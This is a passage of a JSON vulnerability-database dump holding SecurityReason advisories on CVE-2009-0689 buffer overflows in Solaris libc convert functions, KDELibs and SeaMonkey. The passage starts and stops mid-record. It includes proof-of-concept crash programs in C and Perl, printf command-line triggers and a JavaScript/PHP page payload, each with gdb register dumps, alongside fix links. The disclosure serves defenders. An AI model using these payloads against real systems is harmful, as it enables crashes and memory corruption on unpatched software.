\r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAkshevAACgkQpiCeOKaYa9aj5gCcDrfDkGIjDV2Fo+J402jTE7u3\r\nrwYAni4FngpFFwhcsuoZjNGeeh68lJQ+\r\n=eZDR\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-12-15T00:00:00", "published": "2009-12-15T00:00:00", "id": "SECURITYVULNS:DOC:22933", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22933", "title": "Camino 1.6.10 Remote Array Overrun &#40;Arbitrary code execution&#41;", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ Sun Solaris 10 libc/*convert &#40;*cvt&#41; buffer overflow ]\r\n\r\nAuthor: Maksymilian Arciemowicz\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 15.04.2010\r\n- - Pub.: 21.05.2010\r\n\r\nAffected Software:\r\n- - Sun Solaris 10 10/9\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/86\r\n\r\n\r\n- --- 0.Description ---\r\nSYNOPSIS\r\n #include &lt;floatingpoint.h&gt;\r\n\r\n char *econvert&#40;double value, int ndigit, int *decpt, int\r\n *sign, char *buf&#41;;\r\n\r\n char *fconvert&#40;double value, int ndigit, int *decpt, int\r\n *sign, char *buf&#41;;\r\n\r\n char *gconvert&#40;double value, int ndigit, int trailing, char\r\n *buf&#41;;\r\n\r\n char *seconvert&#40;single *value, int ndigit, int *decpt, int\r\n *sign, char *buf&#41;;\r\n\r\n char *sfconvert&#40;single *value, int ndigit, int *decpt, int\r\n *sign, char *buf&#41;;\r\n\r\n char *sgconvert&#40;single *value, int ndigit, int trailing,\r\n char *buf&#41;;\r\n\r\n char *qeconvert&#40;quadruple *value, int ndigit, int *decpt,\r\n int *sign, char *buf&#41;;\r\n\r\n char *qfconvert&#40;quadruple *value, int ndigit, int *decpt,\r\n int *sign, char *buf&#41;;\r\n\r\n char *qgconvert&#40;quadruple *value, int ndigit, int trailing,\r\n char *buf&#41;;\r\n\r\n The econvert&#40;&#41; function converts the value to a null-\r\n terminated string of ndigit ASCII digits in buf and returns\r\n a pointer to buf. buf should contain at least ndigit+1 char-\r\n acters. The position of the decimal point relative to the\r\n beginning of the string is stored indirectly through decpt.\r\n Thus buf == &quot;314&quot; and *decpt == 1 corresponds to the numeri-\r\n cal value 3.14, while buf == &quot;314&quot; and *decpt == -1\r\n corresponds to the numerical value .0314. If the sign of the\r\n result is negative, the word pointed to by sign is nonzero;\r\n otherwise it is zero. The least significant digit is\r\n rounded.\r\n\r\nSYNOPSIS\r\n #include &lt;stdlib.h&gt;\r\n\r\n char *ecvt&#40;double value, int ndigit, int *restrict decpt,\r\n int *restrict sign&#41;;\r\n\r\n char *fcvt&#40;double value, int ndigit, int *restrict decpt,\r\n int *restrict sign&#41;;\r\n\r\n char *gcvt&#40;double value, int ndigit, char *buf&#41;;\r\n\r\nDESCRIPTION\r\n The ecvt&#40;&#41;, fcvt&#40;&#41; and gcvt&#40;&#41; functions convert floating-\r\n point numbers to null-terminated strings.\r\n\r\n\r\n- --- 1. Sun Solaris 10 libc/*convert &#40;*cvt&#41; buffer overflow ---\r\nThe main problem exists in sun solaris libc. OpenSolaris is not affected.\r\n\r\nPoC:\r\n- ---\r\n# cat jaja.c\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n\r\nint main &#40;int argc, char *argv[]&#41;{\r\n\r\n char number[10000];\r\n\r\n int a,b;\r\n\r\n printf&#40;&quot;&#37;s&quot;, fconvert&#40;&#40;double&#41;0,atoi&#40;argv[1]&#41;,&amp;a,&amp;b,number&#41;&#41;;\r\n return 0;\r\n}\r\n\r\n# /usr/local/bin/gcc -o jaja jaja.c\r\n# ./jaja 16\r\n0000000000000000#\r\n# ./jaja 512\r\n00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000#\r\n- ---\r\n\r\nfor 512 will work fine, because we have used &#40;double&#41;0 to convert. When we use no zero\r\nvalue, then crash.\r\n\r\nok. let&#96;s set no zero value in jaja2.c\r\n\r\nPoc:\r\n- ---\r\n# cat jaja2.c\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n\r\nint main &#40;int argc, char *argv[]&#41;{\r\n\r\n char number[10000];\r\n\r\n int a,b;\r\n\r\n printf&#40;&quot;&#37;s&quot;, fconvert&#40;&#40;double&#41;1,atoi&#40;argv[1]&#41;,&amp;a,&amp;b,number&#41;&#41;;\r\n return 0;\r\n}\r\n\r\n# /usr/local/bin/gcc -o jaja2 jaja2.c\r\n# ./jaja2 512\r\nSegmentation fault &#40;core dumped&#41;\r\n# /usr/local/bin/gdb -q jaja2\r\n&#40;no debugging symbols found&#41;\r\n&#40;gdb&#41; r 512\r\nStarting program: /jaja2 512\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeab05c in fconvert &#40;&#41; from /lib/libc.so.1\r\n&#40;gdb&#41; i r\r\neax 0x8047240 134509120\r\necx 0x3250 12880\r\nedx 0x8048000 134512640\r\nebx 0xfef9e000 -17178624\r\nesp 0x8044b38 0x8044b38\r\nebp 0x8044d68 0x8044d68\r\nesi 0x200 512\r\nedi 0x0 0\r\neip 0xfeeab05c 0xfeeab05c &lt;fconvert+163&gt;\r\neflags 0x10206 [ PF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n&#40;gdb&#41; x/x $edx\r\n0x8048000: Cannot access memory at address 0x8048000\r\n&#40;gdb&#41;\r\n- ---\r\n\r\nthe same result we can get with perl&#40;1&#41;\r\n\r\nPoC perl:\r\n- ---\r\n#!/usr/local/bin/perl\r\nprintf &quot;&#37;.512f&quot;, 1;\r\n# perl pss.pl\r\nSegmentation Fault - core dumped\r\n# /usr/local/bin/gdb -q perl\r\n&#40;no debugging symbols found&#41;\r\n&#40;gdb&#41; r pss.pl\r\nStarting program: /usr/bin/perl pss.pl\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfed7b05c in fconvert &#40;&#41; from /lib/libc.so.1\r\n- ---\r\n\r\nok.\r\n\r\nfunction like *cvt&#40;3&#41; are also affected. let&#96;s check ecvt&#40;3&#41;\r\n\r\nPoC:\r\n- ---\r\n# cat jaja3.c\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n\r\nint main &#40;int argc, char *argv[]&#41;{\r\n\r\n int a,b;\r\n\r\n printf&#40;&quot;&#37;s&quot;, ecvt&#40;&#40;double&#41;1,atoi&#40;argv[1]&#41;,&amp;a,&amp;b&#41;&#41;;\r\n return 0;\r\n}\r\n\r\n# ./jaja3 3405\r\n&#37;Y....[some_part_of_memory]\r\n#\r\n- ---\r\n\r\nit&#96;s look like a memory disclosure\r\n\r\nlet&#39;s see bigger value\r\n\r\nPoC:\r\n- ---\r\n# ./jaja3 3500\r\nSegmentation fault &#40;core dumped&#41;\r\n- ---\r\n\r\nnow is the time to debug it\r\n\r\nPoC:\r\n- ---\r\n# /usr/local/bin/gdb -q jaja3\r\n&#40;no debugging symbols found&#41;\r\n&#40;gdb&#41;\r\n&#40;gdb&#41; r 4000\r\nStarting program: /jaja3 4000\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeaaf72 in econvert &#40;&#41; from /lib/libc.so.1\r\n&#40;gdb&#41; i r\r\neax 0xf00 3840\r\necx 0xdac 3500\r\nedx 0xfef929ab -17225301\r\nebx 0xfef9e000 -17178624\r\nesp 0x8047230 0x8047230\r\nebp 0x8047460 0x8047460\r\nesi 0xfa0 4000\r\nedi 0x1 1\r\neip 0xfeeaaf72 0xfeeaaf72 &lt;econvert+144&gt;\r\neflags 0x10287 [ CF PF SF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n- ---\r\n\r\neip can be differ, not ever in econvert+144\r\n\r\nPoC:\r\n- ---\r\n&#40;gdb&#41; r 3501111111\r\nThe program being debugged has been started already.\r\nStart it from the beginning? &#40;y or n&#41; y\r\nStarting program: /jaja3 3501111111\r\n[New LWP 1 ]\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeeaaf89 in econvert &#40;&#41; from /lib/libc.so.1\r\n&#40;gdb&#41; i r\r\neax 0xcfa7d347 -811084985\r\necx 0x0 0\r\nedx 0x1 1\r\nebx 0xfef9e000 -17178624\r\nesp 0x8047230 0x8047230\r\nebp 0x8047460 0x8047460\r\nesi 0xd0aeb747 -793856185\r\nedi 0x1 1\r\neip 0xfeeaaf89 0xfeeaaf89 &lt;econvert+167&gt;\r\neflags 0x10287 [ CF PF SF IF RF ]\r\ncs 0x3b 59\r\nss 0x43 67\r\nds 0x43 67\r\nes 0x43 67\r\nfs 0x0 0\r\ngs 0x1c3 451\r\n- ---\r\n\r\nand not ever should crash in econvert\r\n\r\nvery interesting behavior, we can see in printf&#40;1&#41; program\r\n\r\nPoC:\r\n- ---\r\n# /usr/local/bin/gdb -q printf\r\n&#40;no debugging symbols found&#41;\r\n&#40;gdb&#41; r &#37;.011111f 0\r\nStarting program: /usr/bin/printf &#37;.011111f 0\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfeea48da in _malloc_unlocked &#40;&#41; from /lib/libc.so.1\r\n&#40;gdb&#41; r &#37;.0111111f 0\r\nThe program being debugged has been started already.\r\nStart it from the beginning? &#40;y or n&#41; y\r\n\r\nStarting program: /usr/bin/printf &#37;.0111111f 0\r\n[New LWP 1 ]\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfee852ab in memcpy &#40;&#41; from /lib/libc.so.1\r\n\r\n&#40;gdb&#41; r &#37;.0111111f 1\r\nThe program being debugged has been started already.\r\nStart it from the beginning? &#40;y or n&#41; y\r\n\r\nStarting program: /usr/bin/printf &#37;.0111111f 1\r\n[New LWP 1 ]\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n&#40;no debugging symbols found&#41;\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0xfee8b05c in fconvert &#40;&#41; from /lib/libc.so.1\r\n&#40;gdb&#41; x/i $eip\r\n0xfee8b05c &lt;fconvert+163&gt;: mov &#37;al,&#40;&#37;edx&#41;\r\n- ---\r\n\r\nfor printf&#40;1&#41; we have get eip in:\r\n- - fconvert+163 &#40;the same like in jaja2=512&#41;\r\n- - memcpy\r\n- - _malloc_unlocked\r\n- - others\r\n\r\nthis vuln is very similar to CVE-2009-0689 but we don&#39;t have founded part of gdtoa\r\nlicense in Oracle license and bahavior for above examples are differs as in CVE-2009-0689.\r\n\r\nhttp://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/libc/gen/common/ecvt.c\r\n\r\n- ---\r\n 34 char *\r\n 35 ecvt&#40;arg, ndigits, decpt, sign&#41;\r\n 36 double arg;\r\n 37 int ndigits, *decpt, *sign;\r\n 38 {\r\n 39 if &#40;efcvtbuffer == NULL&#41;\r\n 40 efcvtbuffer = &#40;char *&#41;calloc&#40;1,1024&#41;;\r\n 41 return econvert&#40;arg, ndigits, decpt, sign, efcvtbuffer&#41;;\r\n 42 }\r\n 43 \r\n- ---\r\n\r\nefcvtbuffer = &#40;char *&#41;calloc&#40;1,1024&#41;;\r\nand ndigits is bigger from efcvtbuffer size.\r\n\r\nnow we show econvert&#40;&#41;, \r\n\r\nhttp://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/libc/gen/common/econvert.c\r\n\r\n- ---\r\n 34 econvert&#40;arg, ndigits, decpt, sign, buf&#41;\r\n 35 double arg;\r\n 36 int ndigits, *decpt, *sign;\r\n 37 char *buf;\r\n 38 {\r\n 39 decimal_mode dm;\r\n 40 decimal_record dr;\r\n 41 fp_exception_field_type ef;\r\n 42 int i;\r\n 43 char *pc;\r\n 44 int nc;\r\n 45 \r\n 46 dm.rd = fp_direction; /* Rounding direction. */\r\n 47 dm.df = floating_form; /* E format. */\r\n 48 dm.ndigits = ndigits; /* Number of significant digits. */\r\n 49 double_to_decimal&#40;&amp;arg, &amp;dm, &amp;dr, &amp;ef&#41;;\r\n 50 *sign = dr.sign;\r\n 51 switch &#40;dr.fpclass&#41; {\r\n 52 case fp_normal:\r\n 53 case fp_subnormal:\r\n 54 *decpt = dr.exponent + ndigits;\r\n 55 for &#40;i = 0; i &lt; ndigits; i++&#41;\r\n 56 buf[i] = dr.ds[i];\r\n 57 buf[ndigits] = 0;\r\n 58 break;\r\n- ---\r\n\r\nline 55 and 56 show buffer overflow.\r\n\r\nWe do not know why, but the OpenSolaris project, contains a security patch and the\r\nproject is vulnerable SunOS.\r\n\r\n\r\n- --- 2. Fix ---\r\nSun bug 5105920\r\n\r\nOpenSolaris has removed this issue without realizing the security nature of the bug.\r\n\r\n\r\n- --- 3. Greets ---\r\nsp3x Infospec pi3\r\n\r\n\r\n- --- 4. Contact ---\r\nAuthor: SecurityReason.com [ Maksymilian Arciemowicz ]\r\n\r\nEmail:\r\n- - cxib {a&#92;./t] securityreason [d=t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.com/exploit_alert/ - Exploit Database\r\nhttp://securityreason.com/security_alert/ - Vulnerability Database\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAkv2dzwACgkQpiCeOKaYa9ZlZgCePDO6yzT92gv8BZWgVIzkRVz7\r\nSHIAn2EeEKyQMPdGXWcEahv0lYzwizzy\r\n=SXST\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-05-27T00:00:00", "published": "2010-05-27T00:00:00", "id": "SECURITYVULNS:DOC:23936", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23936", "title": "Sun Solaris 10 libc/*convert &#40;*cvt&#41; buffer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:31:16", "description": "No description provided by source.", "published": "2009-11-19T00:00:00", "type": "seebug", "title": "KDE KDELibs 4.3.3 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2009-11-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18280", "id": "SSV:18280", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - KDELibs 4.3.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/74\r\n\r\n\r\n- --- 0.Description ---\r\nKDELibs is a collection of libraries built on top of Qt that provides\r\nframeworks and functionality for developers of KDE-compatible software.\r\nThe KDELibs libraries are licensed under LGPL.\r\n\r\n\r\n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exist in dtoa implementation. KDE has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist\r\nin dtoa.cpp file\r\n\r\nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&amp;view=markup\r\n\r\nand it is the same like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and\r\nit is possible to call 16&lt;= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat(&quot;9&quot;,299999); ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nIf we use konqueror to see this PoC, konqueror will crash. For example\r\n\r\n- -----------------------\r\n&lt;script&gt;\r\nvar a=0.&lt;?php echo str_repeat(&quot;1&quot;,296450); ?&gt;;\r\n&lt;/script&gt;\r\n- -----------------------\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to process 24845, thread 0x7e6e6800]\r\n0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n\r\n0x06db85c3 &lt;diff+163&gt;: mov %esi,(%ecx)\r\n\r\n#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0\r\n#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0\r\n#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0\r\n#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0\r\n#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0\r\n#6 0x0908337f in KJS::InterpreterImp::evaluate ()\r\n\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x220ff000 571469824\r\nedx 0x0 0\r\nebx 0x220fbb00 571456256\r\nesp 0xcfbc04e0 0xcfbc04e0\r\nebp 0xcfbc0518 0xcfbc0518\r\nesi 0xc71c71c7 -954437177\r\nedi 0x0 0\r\neip 0x21415c3 0x21415c3\r\n\r\nesi=0x71c71c7\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number &quot;CVE-2009-1563&quot;. Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on &quot;CVE-2009-0689&quot;. After some time Mozilla Foundation\r\nSecurity Advisory\r\n(&quot;http://www.mozilla.org/security/announce/2009/mfsa2009-59.html&quot;;)\r\nwas updated with note :\r\n&quot;The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)&quot;.\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4lEACgkQpiCeOKaYa9ZD+ACfSoaEiTeQrFDgtcHgOckyXMom\r\nTE4AoJW3meP7KP6Xb7KNErVlsluLUO8E\r\n=jTmp\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18280", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:23:19", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "SeaMonkey 1.1.8 - Remote Array Overrun", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67075", "id": "SSV:67075", "sourceData": "\n From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - SeaMonkey 1.1.18\r\n\r\nFixed in:\r\n- - SeaMonkey 2.0\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/71\r\n\r\n\r\n- --- 0.Description ---\r\nThe SeaMonkey project is a community effort to develop the SeaMonkey\r\nall-in-one internet application suite (see below). Such a software suite\r\nwas previously made popular by Netscape and Mozilla, and the SeaMonkey\r\nproject continues to develop and deliver high-quality updates to this\r\nconcept. Containing an Internet browser, email & newsgroup client with\r\nan included web feed reader, HTML editor, IRC chat and web development\r\ntools, SeaMonkey is sure to appeal to advanced users, web developers and\r\ncorporate users.\r\n\r\n\r\n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exist in dtoa implementation. SeaMonkey has the same\r\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4 and fix\r\n\r\nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42\r\n\r\nhas been used to patch SeaMonkey 2.0.\r\n\r\nThis flaw has been detected in may 2009 and signed SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don&#39;t checks Kmax limit, and it\r\nis possible to call 16&#60;= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n&#60;script&#62;\r\nvar a=0.&#60;?php echo str_repeat(&#34;9&#34;,299999); ?&#62;;\r\n&#60;/script&#62;\r\n- -----------------------\r\n\r\nIf we use SeaMonkey to see this PoC, SeaMonkey will crash. For example\r\n\r\n- 